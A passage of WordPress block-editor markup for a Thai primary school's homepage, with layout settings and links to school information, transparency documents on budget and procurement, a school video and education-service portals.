title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table 